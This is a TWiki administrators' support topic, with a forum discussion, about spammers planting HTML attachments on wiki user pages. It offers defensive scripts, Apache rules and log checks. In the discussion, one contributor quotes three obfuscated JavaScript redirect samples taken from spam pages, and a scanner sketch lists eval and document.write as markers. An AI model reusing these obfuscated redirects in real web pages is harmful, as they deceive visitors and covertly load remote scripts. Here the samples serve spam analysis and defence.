HTML Attachment Spam - Beware of New Type of Spam
NOTE: All administrators of public TWiki sites are encouraged to upgrade to the latest BlackListPlugin, version 2013-03-22. It prevents known wiki spam from being saved in TWiki topics or uploaded as HTML attachments, makes scripted registrations harder, and protects the site from excessive use by a single IP address. It also protects TWiki sites against topic text and attachments containing malicious script calls such as eval() and escape().
Recently a new type of spam has been seen that can have very negative consequences for TWiki site owners.
Traditionally, spammers have added links to their porn/medicine/whatever websites in an effort to get a higher Google ranking.
Naturally this meant that their URLs quickly got blacklisted everywhere.
Now they use our TWikis as web servers.
So far, they register as a regular user and edit only their own user topic.
What they do is add a number of attachments to the user page. The attachments are all HTML pages, which your Apache will serve quite normally without involving TWiki, because they are served straight out of the pub directory.
After they have planted their files, they start adding links directly to these HTML files from various other wikis, blogs, guestbooks, forums, etc. And YOUR site ends up ranking high on Google for searches on various product names.
And soon YOUR IP address and domain name will be on the common blacklists. If your TWiki is important to you and/or your business, you should be concerned about this.
The first thing you should do when you read this is look for a user called NeoVertigo. He has spammed quite a few TWikis in the past few days.
The second thing is to look in the pub/Main directory and check your users' attachments. Look for .htm or .html files.
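If you have shell access, a small script can do this search for you. The Python sketch below assumes TWiki is installed under /var/www/twiki (the path used in the Apache example further down); PUB_DIR is a placeholder to adjust for your site. Pointing it at pub/Trash as well catches attachments that spammers have moved there.

```python
"""List .htm/.html attachments below a TWiki pub directory (a sketch)."""
import os
import sys
import time

PUB_DIR = "/var/www/twiki/pub/Main"  # assumed path, adjust to your site
HTML_SUFFIXES = (".htm", ".html")


def find_html_attachments(pub_dir):
    """Return (path, mtime) pairs for every .htm/.html file under pub_dir."""
    hits = []
    for root, _dirs, files in os.walk(pub_dir):
        for name in files:
            # lower() also catches variants such as SPAM.HTML
            if name.lower().endswith(HTML_SUFFIXES):
                path = os.path.join(root, name)
                hits.append((path, os.path.getmtime(path)))
    # Newest files first, since fresh uploads are the most likely spam.
    return sorted(hits, key=lambda hit: hit[1], reverse=True)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else PUB_DIR
    for path, mtime in find_html_attachments(target):
        print(time.strftime("%Y-%m-%d %H:%M", time.localtime(mtime)), path)
```

Run it as, for example, `python find_html.py /var/www/twiki/pub/Trash` to check another web.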
If you find something, my experience is that the spammer has invested quite a lot of energy in getting his pub directory a high Google ranking, so he will keep re-registering and adding his junk again and again. One spammer was seen re-registering 4 times within 3 hours on the same site. It is not enough to delete his user account; you need to make it useless and prevent re-registration.
- Remove all content from his home page.
- Delete the ,v file so there is no history. Delete the pub directory that belongs to his account.
- Put a
   * Set ALLOWTOPICCHANGE = Main.TWikiAdminGroup
  setting in his topic,
- or, if possible, change the ownership of both the topic and his directory under pub to root and chmod them to 400. This way the spammer will get nothing but errors.
- Finally, change his entry in .htpasswd to an invalid password and, importantly, change the email address in .htpasswd to your own email address if you run TWiki4.
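The file-level steps above can be scripted roughly as follows. This is a minimal Python sketch, assuming the standard TWiki layout (topic text in data/<Web>/<Topic>.txt, RCS history in the matching ,v file, attachments in pub/<Web>/<Topic>/); neutralize_user is a hypothetical helper name. It applies both the ALLOWTOPICCHANGE setting and the 400 mode, and leaves the .htpasswd change and the chown to root for you to do by hand. Try it on a copy of your site first.

```python
import os
import shutil

# A TWiki preference setting is written as a bullet indented by three spaces.
LOCKED_TOPIC_TEXT = "   * Set ALLOWTOPICCHANGE = Main.TWikiAdminGroup\n"


def neutralize_user(twiki_root, user, web="Main"):
    """Empty and lock data/<web>/<user>.txt and wipe pub/<web>/<user>/.

    Hypothetical helper: does not edit .htpasswd and does not chown
    anything to root; do both by hand as root.
    """
    topic = os.path.join(twiki_root, "data", web, user + ".txt")
    history = topic + ",v"
    attachments = os.path.join(twiki_root, "pub", web, user)

    # Empty the home page, leaving only the ALLOWTOPICCHANGE restriction.
    with open(topic, "w") as fh:
        fh.write(LOCKED_TOPIC_TEXT)
    # Delete the RCS history so the spam cannot be restored from old revisions.
    if os.path.exists(history):
        os.remove(history)
    # Delete the attachment directory, then recreate it empty.
    shutil.rmtree(attachments, ignore_errors=True)
    os.makedirs(attachments)
    # Mode 0400 as suggested above; combine with chown root (run as root)
    # so the web server user cannot simply change the mode back.
    os.chmod(attachments, 0o400)
    os.chmod(topic, 0o400)
```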
How can we prevent him from making a new account and starting all over? We cannot. But we can annoy him.
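In your httpd.conf (inside the <Directory> section for your TWiki root, or in a .htaccess file there, so that the RewriteRule path is matched relative to the TWiki root) you can add this: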
RedirectMatch .*pub/Main.*\.htm.*$ http://yourdomain.com/nospam.htm
RewriteEngine On
RewriteCond %{QUERY_STRING} ^.*htm.*$
RewriteRule ^bin/viewfile/Main.* http://yourdomain.com/nospam.htm [R,L]
and put a polite message for both the spammer and other visitors on that page.
These lines prevent anyone from viewing .htm or .html files in any user's pub directory, whether directly or through the viewfile script.
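To check which requests these rules catch before deploying them, you can replay the same regular expressions in Python. This sketch assumes TWiki is served under a hypothetical /twiki/ URL prefix and that the rewrite rules live in per-directory context; it only approximates Apache's behavior and is no substitute for testing against a real server.

```python
import re

# The same regular expressions as the Apache directives above; Python's re
# module treats these simple patterns the same way Apache's PCRE does.
REDIRECT_MATCH = re.compile(r".*pub/Main.*\.htm.*$")  # RedirectMatch
VIEWFILE_RULE = re.compile(r"^bin/viewfile/Main.*")   # RewriteRule
HTM_QUERY = re.compile(r"^.*htm.*$")                  # RewriteCond


def is_redirected(url_path, query_string="", twiki_prefix="/twiki/"):
    """Return True if the rules above would send the request to nospam.htm."""
    # RedirectMatch searches the full URL path.
    if REDIRECT_MATCH.search(url_path):
        return True
    # In per-directory context the RewriteRule sees the path relative to the
    # TWiki root, so strip the (hypothetical) /twiki/ prefix first.
    if url_path.startswith(twiki_prefix):
        relative = url_path[len(twiki_prefix):]
    else:
        relative = url_path.lstrip("/")
    return bool(VIEWFILE_RULE.search(relative) and HTM_QUERY.search(query_string))
```

For example, `is_redirected("/twiki/bin/viewfile/Main/NewGood", "filename=spam.html")` is caught by the RewriteCond/RewriteRule pair, while attachments in other webs pass through.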
If you never attach HTML files to any topic, you can block them in every web:
RedirectMatch .*pub/.*\.htm.*$ http://yourdomain.com/nospam.htm
RewriteEngine On
RewriteCond %{QUERY_STRING} ^.*htm.*$
RewriteRule ^bin/viewfile/.* http://yourdomain.com/nospam.htm [R,L]
In TWiki4 you can defuse uploads of .htm and .html files by forcing TWiki to append .txt to the file name. This does not prevent people from seeing the spam file, but it is then shown as raw HTML, which is not very interesting to anyone. The filter applies to all webs and also prevents legitimate users from uploading HTML files to the pub directories, but it is rare that anyone really needs that.
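The renaming idea can be sketched in Python as follows. The regular expression here is a hypothetical filter containing only the htm|html suggestion; the actual default value of $TWiki::cfg{UploadFilter} is different, so check your own configuration.

```python
import re

# Hypothetical filter covering only .htm/.html; not TWiki's real default.
UPLOAD_FILTER = re.compile(r"\.(?:htm|html)$", re.IGNORECASE)


def sanitize_upload_name(filename):
    """Append .txt to file names that match the filter."""
    if UPLOAD_FILTER.search(filename):
        return filename + ".txt"
    return filename
```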
It has been suggested to add htm|html to $TWiki::cfg{UploadFilter}, but this is of little use because the most popular browser, Internet Explorer, does not care about the .txt extension and shows the contents as a web page anyway.
Here is a command you can run in your twiki/data directory to check a monthly log (TWiki writes one log file per month, named logYYYYMM.txt) for uploads of files ending in .htm:
egrep ' upload .*\.htm' log202401.txt
Here is an improved command you can put into an "ths" alias (mnemonic "type html spam") for easy access:
alias ths='egrep " upload .*\.htm" log`date +%Y%m`.txt |
sed "s/upload . \([^\.]*\)\.\([^ ]*\) . /http:\/\/twiki.org\/p\/pub\/\1\/\2\//" | tail -20'
This is twiki.org specific; it rewrites each matching log entry so that it contains a complete URL of the form http://twiki.org/p/pub/<Web>/<Topic>/<file>, ready for copy & paste.
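For sites other than twiki.org, the same report can be produced with a short Python script. This sketch assumes the TWiki log line layout shown in its comment (timestamp, user, action, Web.Topic, extra information, IP address, separated by |); verify that against your own log files before relying on it. BASE_URL is the twiki.org value from the alias and must be replaced with your own pub URL.

```python
import time

# Assumed TWiki log line layout (check against your own data/log*.txt):
# | 2006-05-27 - 10:20 | Main.NewGood | upload | Main.NewGood | spam.html | 1.2.3.4 |
BASE_URL = "http://twiki.org/p/pub"  # twiki.org specific; use your own pub URL


def html_upload_urls(lines, base_url=BASE_URL):
    """Return attachment URLs for uploads whose file name contains .htm."""
    urls = []
    for line in lines:
        fields = [f.strip() for f in line.strip().strip("|").split("|")]
        if len(fields) < 5 or fields[2] != "upload":
            continue
        web_topic, filename = fields[3], fields[4]
        if ".htm" not in filename.lower():  # case-insensitive, unlike egrep
            continue
        web, _, topic = web_topic.partition(".")
        urls.append(f"{base_url}/{web}/{topic}/{filename}")
    return urls[-20:]  # like `tail -20` in the alias


def current_log_name(now=None):
    """Name of this month's log, like log`date +%Y%m`.txt in the alias."""
    return time.strftime("log%Y%m.txt", time.localtime(now))
```

Typical use from the data directory: `with open(current_log_name()) as fh: print("\n".join(html_upload_urls(fh)))`.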
The spammers' next move is to use the Trash web: they upload first and then move the attachment to Trash. It is therefore wise to block access to all files in the pub directory of the Trash web.
This can be done in the Apache config file, for example:
<Directory "/var/www/twiki/pub/Trash">
# Apache 2.2 syntax; on Apache 2.4 use "Require all denied" instead
Deny from all
</Directory>
We hope people will come up with more and maybe better countermeasures. Take this one seriously, since you do not want your IP address or domain to end up blacklisted.
-- Contributors: KennethLavrsen, PeterThoeny
Discussion
The BlackListPlugin should be enhanced to also check uploaded HTML files.
-- PeterThoeny - 26 May 2006
Since Internet Explorer shows .txt files with HTML inside as web pages, there is little point in adding htm|html to the upload filter. So I removed it from the text above again.
-- KennethLavrsen - 26 May 2006
Just had the first case here on twiki.org: someone registered as NewGood and attached 6 spam HTML pages to the user home page. I removed the account, trashed the attachments and set the attachment directory to read-only.
-- PeterThoeny - 27 May 2006
A new version of the BlackListPlugin that scans for HTML attachment spam is available in the TWiki 4 branch of SVN. I will release it in the next few days, after investigating an issue with the beforeAttachmentSaveHandler on Solaris (Bugs:Item2390) that breaks file uploads. Please help test the Plugin.
-- PeterThoeny - 01 Jun 2006
Wiki spam isn't a new problem, of course, but as spammers and scammers get more desperate they are likely to pursue new ways of conducting their "business" more actively. So it's very good that you've enhanced the BlackListPlugin to try to deal with this. Unfortunately, this is likely to be a continuing battle, as those of us who have fought on the email spam front have discovered, and the very nature of wikis makes it especially hard to combat.
-- MeredithLesly - 03 Jun 2006
As long as spammers are successful in their marketing (I am starting to think the criterion for this is that just one person actually buys their stuff...), this will continue. The problem will only really be solved when people choose to do something other than respond to the spam :-/.
But as this is not going to happen any time soon, let's continue the "fight".
If we look at spam currently sent over SMTP, most of it (75%, based on a quick review of my own share of ~90 mails/day) is sent as image attachments (JPGs). That rules out traditional regex-based filters, and the same is going to happen with TWiki spam.
For now the spammers appear to use HTML-based spam against TWiki (because they are experimenting with search engine ratings), but as soon as the BlackListPlugin and other automatic measures are effective against this HTML/text-based kind, we will start to see JPG/image/PPT/PDF/choose-your-binary-format-based spam instead.
Trying to automate this through OCR and other technical initiatives is one way to go, but getting your community focused on this problem is a better and simpler approach in my view.
One thing we could consider while waiting: since Google automatically interprets many binary formats, a regular Google check of your site is one of the easy things you can schedule (e.g. a simple search like http://www.google.com/search?q=%2Bviagra+%2Binurl:twiki, adding a +site:mysite.com parameter). Unfortunately, leveraging this through e.g. the BlackListPlugin is quite a job (remove the content, trace/remove the contributor's account, ban the IP address range or similar); a community effort can apply more IQ up front and is readily available.
Btw: if you explore some of the links from the search, you will notice that much of the spam is not actually displayed to a visiting user but just hidden in the source (typically using style=display:none). So we need to be aware that the purpose of this kind of spam is often something other than displaying links to the user (higher ratings and more referrers are just as important).
-- SteffenPoulsen - 04 Jun 2006
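The hidden-content trick can be checked for with a simple pattern match on attachment text. A minimal Python sketch follows; the regular expression is an assumption that only covers inline style attributes, and obfuscated variants that assemble the style string in JavaScript (such as Case 2 below) will slip through.

```python
import re

# Matches inline styles such as style=display:none or style="color:red; display: none".
# Quoting and whitespace vary in the wild, so the pattern allows both.
HIDDEN_STYLE = re.compile(r"""style\s*=\s*["']?[^"'>]*display\s*:\s*none""", re.IGNORECASE)


def count_hidden_blocks(html):
    """Count inline style attributes that hide content from visitors."""
    return len(HIDDEN_STYLE.findall(html))
```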
Yet another twist has emerged: e-mail spam pointing to HTML attachment spam that immediately redirects to a spam site (in order to earn clicks). To complicate matters, the redirect is obfuscated with JavaScript. So far I have identified three different approaches to obfuscating the spam site URL. Examples:
Case 1, in the HTML body:
<SCRIPT language=JavaScript>
<!--
function
otqzyu(nemz){fak="lo";sqg5="catio";hez8="n.r";vj20=2;mek13="eplac";rgi18="e";vbb25="('";awq27="";so26=4;asfww="'ht";awg44ag="tp:/";wqeno3="/www.bestgamblecasino";qemowr=".com/";wefgnm="a01";qegmik="68/";qwtqqqqq="main/";thktk="00/'";dh4=eval(asfww+awg44ag+wqeno3+qemowr+wefgnm+qegmik+qwtqqqqq+thktk);je15="')";if
(vj20+so26==6) eval(fak+sqg5+hez8+mek13+rgi18+vbb25+awq27+dh4+je15);}
otqzyu();//-->
</SCRIPT>
Case 2, in the HTML body:
<script>var t='<span id="sp" sty'+'le="dis'+'play:n'+'one"><h'+'1>404
Not Found'+'</'+'h1><span
sty'+'le="dis'+'play:n'+'one">';document.write(t);var
ref=escape(document.referrer); var s="<scr"+"ipt
src='ht"+"tp://chea"+"pest-pharmacy.u"+"s/c.js?q=cialis&ref="+ref+"'><\/sc"+"ript>";document.write(s);</script>
Case 3, between the HTML head and body:
<script src='x.js' type='text/javascript'>
And with this content in the x.js file:
eval(unescape("x%3D195%3B%0D%0Ay%3Dx%2D1%3B%0D%0Aif%28x%21%3Dy%29%20document%2Elocation%3D%22http%3A%2F%2Fwww%2Epharmacyvip%2Ecom%2Fpbm/xanax/xanax.htm%22%3B%0D%0A"));
The latest BlackListPlugin does not yet protect against obfuscated URLs; until it does, I suggest that site operators monitor HTML attachments daily.
-- PeterThoeny - 09 Jun 2006
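Part of that daily check can be automated. This Python sketch flags the script calls used in the three cases above and percent-decodes the text to expose URLs hidden with escape(), as in Case 3. It is a heuristic under stated assumptions: the string concatenation in Cases 1 and 2 still hides the URL from it, although their eval( and document.write calls get flagged.

```python
import re
from urllib.parse import unquote

# Markers typical of the obfuscated redirects shown above.
SUSPICIOUS = ("eval(", "unescape(", "escape(", "document.write", "document.location")
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def scan_attachment(text):
    """Return (markers found, URLs visible after percent-decoding)."""
    decoded = unquote(text)  # undoes %3A%2F%2F-style escaping (Case 3)
    combined = (text + "\n" + decoded).lower()
    markers = [m for m in SUSPICIOUS if m in combined]
    urls = sorted(set(URL_RE.findall(decoded)))
    return markers, urls
```

Any attachment for which scan_attachment returns a non-empty result deserves a manual look.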
It's also important to make sure that WIKIWEBMASTER is set in Main.TWikiPreferences, so that you receive notifications of new registrations. Many public sites have the notices going to webmaster@example.com.
-- MeredithLesly - 09 Jun 2006
After adding the RedirectMatch line to my .htaccess file, I noticed that HTML files were still accessible via the viewfile script. I've added the following lines to the recommendations above. They seem to work well for my site, but I would be grateful if someone else could try them too.
RewriteCond %{QUERY_STRING} ^.*htm.*$
RewriteRule ^bin/viewfile/.* http://yourdomain.com/nospam.htm
-- AndyPryke - 25 Jun 2006
The evil spammers have placed hundreds if not thousands of links to their spam, which was placed on my website. I get a great number of hits on these pages.
In order to discourage the spammers, I think it makes sense to try and undermine their business model. If they spend the effort to create these links, but their potential "customers" or victims are put off, then their attempts at spamming have a negative effect on their profits. I think that this is the ultimate disincentive.
I have redirected the spam pages to a message that says:
This page of spam advertising has been removed.
It was not placed on this website by the website owner.
If you try and buy drugs from spammers they will steal your credit card details.
You're also very unlikely to receive any pills, and if you do they will probably be complete fakes or dangerous.
If you do feel that you need to obtain medicines, please see a qualified doctor who can advise you about their suitability and side effects.
You can see the page here: http://www.the-data-mine.com/spam_message.html
I'd recommend that other TWiki admins do the same, as I believe it will have a genuine effect against the spammers.
Any comments?
-- AndyPryke - 03 Jul 2006
Doesn't work. Doesn't cost them money. Just keeps eating your bandwidth.
-- MeredithLesly - 03 Jul 2006
It helps if humans click on the link. Spammers spam wiki sites mainly in the hope that search engines index the pages and raise their ranking because many sites point to their spam.
Andy, to reduce spam on your site, it is better to remove all spam as quickly as possible. Spammers search for "viagra" and other spam words to find easy targets.
Update your robots.txt file and ask Google to update the cache of your site: http://www.google.com/support/webmasters/bin/topic.py?topic=8459
-- PeterThoeny - 03 Jul 2006
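A robots.txt rule for the pub directory might look like the ROBOTS_TXT string below, assuming TWiki is installed under a hypothetical /twiki/ URL path. The Python sketch uses the standard urllib.robotparser module to confirm what well-behaved crawlers would skip. Note that robots.txt does not stop anyone from fetching the files; it only keeps compliant search engines from indexing them, and it also hides legitimate attachments from search results.

```python
from urllib.robotparser import RobotFileParser

# Hypothetical robots.txt for a TWiki installed under /twiki/.
ROBOTS_TXT = """\
User-agent: *
Disallow: /twiki/pub/
"""


def build_parser(robots_txt=ROBOTS_TXT):
    """Parse robots.txt text without fetching it over the network."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return parser
```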
Updating the robots.txt to block indexing of the "pub" directory makes sense - I'll do this.
You're right that the spammers who place links in TWiki pages are doing this to increase their search ranking.
However, the spammers who add HTML as an attachment have a different tactic. This is evidenced by their (massive but presumably scripted) efforts to provide links to the pages they have uploaded. For example, Google reports 21,000 links to the pages they uploaded to my site, though if you click through the Google listings, they stop at about page 98. I get a few hundred click-throughs a day at the moment.
Each of those 21k (or 980) links is competing for people who will click on dodgy dr_gs links. The people who click through are mostly "warm leads". If TWiki sites get a reputation for (i) quickly removing HTML spam and (ii) putting off those warm leads, then spammers will go elsewhere; they're in this to make money, not to cause us problems (it's just that they don't mind causing us problems).
In terms of bandwidth, the impact of a simple text page is negligible.
By the way, I also got an email from NewGood saying that they were having problems changing their password! I did respond, but their inbox was full.
-- AndyPryke - 04 Jul 2006 (either forgot to add last time or it got deleted by accident)
All I can relate, from many years of experience in fighting email spam (and keeping it away from my clients), is that spammers adapt faster than we ever can. The only thing that has changed at all is that a few ISPs that used to be willing to host spammers don't any more. The result? Spammers created viruses that turn Windows machines into spamming machines, either sending out mail or hosting sites (primarily the former). I venture to say 90% of the spam sent to my clients comes from infected machines. This, by the way, is why blocking IP numbers doesn't work and in fact has a negative effect: the IP numbers belong to innocent people who don't know that they're infected, who might be interested in a wiki site, and who will wind up being blocked from registering through no fault of their own (other than running an infected machine, of course).
If you (or anyone else who is concerned with this problem) want to learn more about fighting spammers, read the various news.admin.net-abuse.* newsgroups. This battle has been going on for a long, long time, with sadly few positive effects.
-- MeredithLesly - 04 Jul 2006
I don't agree that blacklisting IPs of zombified Windows machines is a bad idea - the owners of such machines need to learn how to keep their machine secure through auto-updates, anti-virus/spyware scanning, etc, so it is a good thing if a lot of sites start to block them. Then, maybe they'll call their ISP who will diagnose that their PC's been zombified and help them clean it up. Of course, this will only work if the blacklist address list is very widely used and they visit a blog/wiki that uses it.
-- RichardDonkin - 05 Jul 2006